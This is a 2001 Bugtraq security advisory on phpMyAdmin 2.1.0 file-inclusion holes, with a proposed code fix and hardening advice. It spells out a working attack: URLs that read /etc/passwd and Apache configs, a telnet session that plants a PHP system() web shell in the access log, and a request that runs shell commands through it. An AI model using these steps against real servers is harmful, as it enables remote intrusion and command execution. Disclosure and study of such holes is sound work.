Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

phpMyAdmin 2.1.0 + world readable (apache) log files enable remote user to run

From: alias () securityfocus com
Date: 1 Jul 2001 23:42:45 -0000
arbitrary PHP Codes as apache user.
From: <sl4sh () ifrance com>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Date: Sun, 1 Jul 2001 23:43:17 GMT
Message-id: <200107012343.115e () lh00 opsion fr>

Note : sorry for my pity english.

*****************************************************
*******************************

First of all, i want to ask a question, is it normal
that if, in a MySQL query -via
PHP-, i put "select * from $table" . "_files where
ID=3D1" and i post table=3D"atable #",
MySQL consider the new query as a valid one (so the
final query will be
"select * from atable") ? It's, in my opinion, a
serious hole in MySQL query...
(I use mysql_query() to do this)

*****************************************************
*******************************


In this text, i will assume that i've an access to
the phpMyAdmin of victim.com
and that phpMyAdmin is located at
http://www.victim.com/phpMyAdmin

* Overview

phpMyAdmin is a usefull php tool for managing a MySQL
database through a=20
web-based interface. phpMyAdmin is used a lot on web
provider who give access
to a MySQL database.
for more information see :
http://www.phpwizard.net/projects/phpMyAdmin/

The holes described below were tested on a Debian 2.2
and on a RedHat 7.1 with
phpMyAdmin 2.1.0.



I. The phpMyAdmin 2.1.0 holes

There's two include() holes in phpMyAdmin 2.1.0 -
this is the latest version
but it may work on the older's ones.
These two holes can be reach with something like this
:
=20
http://www.victim.com/phpMyAdmin/sql.php?goto=3D/etc/pa
sswd&btnDrop=3DNo (*)
and
=20
http://www.victim.com/phpMyAdmin/tbl_replace.php?db=3Dt
est&table=3Dess&goto=3D/etc/passwd

Of course, to exploit this holes, the attacker need
to be logged on remote
phpMyAdmin.

These holes come from a line like this :
'include($goto);' in sql.php and in
tbl_replace.php.

With this you could read a lot of file, and execute
every php code in the
remote server.

(*) Note : for btnDrop the value could be in other
language (in my configuration,
i must put 'Non' instead of 'No').



II. Using world readable (apache) log files to
execute our own php codes

By using world readable log files (here, i will use
apache log files but
you can use others log files like lastlog (in giving
the good login), telnet
log file, ftp log file...) , you can execute, with
the hole described before,
the php code you want.

First, you get the apache configuration file to know
where logs are :
=20
http://www.victim.com/phpMyAdmin/sql.php?goto=3D/etc/ap
ache/conf/httpd.conf&btnDrop=3DNo
=20
http://www.victim.com/phpMyAdmin/sql.php?goto=3D/etc/ap
ache/conf/srm.conf&btnDrop=3DNo
=20
http://www.victim.com/phpMyAdmin/sql.php?goto=3D/etc/ap
ache/conf/access.conf&btnDrop=3DNo

Now, we assume that logs are in
/var/log/httpd/error_log for errors and in
/var/log/httpd/access_log for apache access (it must
be the default in RedHat 7.1).

we telnet to port 80 :
# telnet www.victim.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.victim.com.
Escape character is '^]'.
get <pre><? system(stripslashes($parameters));
?></pre>
^]
telnet> quit
Connection closed.
#=20

Here, after get, we can put any php code we want.

Now, we can execute any remote command we want as
apache user by doing :
http://www.victim.com/phpMyAdmin/sql.php?goto=3D/var/lo
g/httpd/access_log&btnDrop=3DNo&parameters=3Dls%20-l%20/
(in fact, by sending a unix command to parameters).

Now, you're able to do nearly whatever apache user
could do.


III. Solutions

The solutions to the phpMyAdmin holes are to put user
access control, restrict the users able to access
to phpMyAdmin, etc...
The code manipulations to avoid this holes are :
in sql.php :
  replace :
        if(file_exists($goto))
        {
            include("header.inc.php");
            if(isset($zero_rows) &&
!empty($zero_rows))
                $message =3D $zero_rows;
            else
                $message =3D $strEmptyResultSet;
            include($goto);
        }
        else
        {
            $message =3D $zero_rows;
            Header("Location: $goto");
        }

  by :
            $message =3D $zero_rows;
            Header("Location: $goto");

and in tbl_replace.php :
  replace :
    if(file_exists($goto))
    {
        include("header.inc.php");
        $message =3D $strModifications;
        include($goto);
    }
    else
        Header("Location: $goto");
    exit;

by :
        Header("Location: $goto");


Of course, phpMyAdmin could not work properly after
this correction (not tested).


For the second hole (world readable log files), just
put all the log files you can
to read-write for root and nothing for others.
Also try to do not put something like
include($params); in your php codes (or others
server-side language like perl).
Remove authorization for unix functions in the PHP
configuration.



Slash <slash-rtc () fr st> [RtC]

=20
____________________________________________________________=
__________________
ifrance.com, l'email gratuit le plus complet de l'Internet !
vos emails depuis un navigateur, en POP3, sur Minitel, sur l=
e WAP...
http://www.ifrance.com/_reloc/email.emailif
Previous By Date Next
Previous By Thread Next

Current thread: